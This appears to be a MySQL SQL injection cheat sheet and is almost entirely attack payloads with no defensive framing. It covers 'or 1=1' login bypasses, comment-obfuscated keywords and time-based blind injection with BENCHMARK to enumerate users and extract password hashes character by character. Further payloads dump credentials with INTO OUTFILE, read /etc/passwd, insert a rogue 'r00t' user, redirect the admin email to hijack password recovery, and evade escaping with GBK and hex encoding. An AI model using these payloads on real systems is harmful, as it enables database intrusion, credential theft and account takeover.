Basics. SELECT * FROM login /* foobar */ SELECT * FROM login WHERE id = 1 or 1=1 SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE "%root%" Variations. SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 A/**/ND user L/**/IKE "%root%" SHOW TABLES SELECT * FROM login WHERE id = 1 or 1=1; SHOW TABLES SELECT VERSION SELECT * FROM login WHERE id = 1 or 1=1; SELECT VERSION() SELECT host,user,db from mysql.db SELECT * FROM login WHERE id = 1 or 1=1; select host,user,db from mysql.db; Blind injection vectors. Operators SELECT 1 && 1; SELECT 1 || 1; SELECT 1 XOR 0; Evaluate all render TRUE or 1. SELECT 0.1 <= 2; SELECT 2 >= 2; SELECT ISNULL(1/0); Math SELECT FLOOR(7 + (RAND() * 5)); SELECT ROUND(23.298, -1); Misc SELECT LENGTH(COMPRESS(REPEAT('a',1000))); SELECT MD5('abc'); Benchmark SELECT BENCHMARK(10000000,ENCODE('abc','123')); this takes around 5 sec on a localhost SELECT BENCHMARK(1000000,MD5(CHAR(116))) this takes around 7 sec on a localhost SELECT BENCHMARK(10000000,MD5(CHAR(116))) this takes around 70 sec on a localhost Using the timeout to check if user exists SELECT IF( user = 'root', BENCHMARK(1000000,MD5( 'x' )),NULL) FROM login Beware of of the N rounds, add an extra zero and it could stall or crash your browser! Gathering info Table mapping SELECT COUNT(*) FROM tablename Field mapping SELECT * FROM tablename WHERE user LIKE "%root%" SELECT * FROM tablename WHERE user LIKE "%" SELECT * FROM tablename WHERE user = 'root' AND id IS NOT NULL; SELECT * FROM tablename WHERE user = 'x' AND id IS NULL; User mapping SELECT * FROM tablename WHERE email = 'user@site.com'; SELECT * FROM tablename WHERE user LIKE "%root%" SELECT * FROM tablename WHERE user = 'username' Advanced SQL vectors Writing info into files SELECT password FROM tablename WHERE username = 'root' INTO OUTFILE '/path/location/on/server/www/passes.txt' Writing info into files without single quotes: (example) SELECT password FROM tablename WHERE username = CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39)) INTO OUTFILE CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39)) Note: You must specify a new file, it may not exist! and give the correct pathname! The CHAR() quoteless function SELECT * FROM login WHERE user = CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39)) SELECT * FROM login WHERE user = CHAR(39,97,39) Extracting hashes SELECT user FROM login WHERE user = 'root' UNION SELECT IF(SUBSTRING(pass,1,1) = CHAR(97), BENCHMARK(1000000,MD5('x')),null) FROM login example: SELECT user FROM login WHERE user = 'admin' UNION SELECT IF(SUBSTRING(passwordfield,1,1) = CHAR(97), BENCHMARK(1000000,MD5('x')),null) FROM login SELECT user FROM login WHERE user = 'admin' UNION SELECT IF(SUBSTRING(passwordfield,1,2) = CHAR(97,97), BENCHMARK(1000000,MD5('x')),null) FROM login explaining: (passwordfield,startcharacter,selectlength) is like: (password,1,2) this selects: ‘ab’ is like: (password,1,3) this selects: ‘abc’ is like: (password,1,4) this selects: ‘abcd’ A quoteless example: SELECT user FROM login WHERE user = CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39)) UNION SELECT IF(SUBSTRING(pass,1,2) = CHAR(97,97), BENCHMARK(1000000,MD5(CHAR(59))),null) FROM login Possible chars: 0 to 9 – ASCII 48 to 57 ~ a to z – ASCII 97 to 122 Misc Insert a new user into DB INSERT INTO login SET user = 'r00t', pass = 'abc' Retrieve /etc/passwd file, put it into a field and insert a new user load data infile "/etc/passwd" INTO table login (profiletext, @var1) SET user = 'r00t', pass = 'abc' Then login! Write the DB user away into tmp SELECT host,user,password FROM user into outfile '/tmp/passwd'; Change admin e-mail, for “forgot login retrieval.” UPDATE users set email = 'mymail@site.com' WHERE email = 'admin@site.com'; Bypassing PHP functions (MySQL 4.1.x before 4.1.20 and 5.0.x) Bypassing addslashes() with GBK encoding WHERE x = 0xbf27admin 0xbf27 Bypassing mysql_real_escape_string() with BIG5 or GBK "injection string" ????????? the above chars are Chinese Big5 Advanced Vectors Using an HEX encoded query to bypass escaping. Normal: SELECT * FROM login WHERE user = 'root' Bypass: SELECT * FROM login WHERE user = 0x726F6F74 Inserting a new user in SQL. Normal: insert into login set user = ‘root’, pass = ‘root’ Bypass: insert into login set user = 0x726F6F74, pass = 0x726F6F74 How to determin the HEX value for injection. SELECT HEX('root'); gives you: 726F6F74 then add: 0x before it.
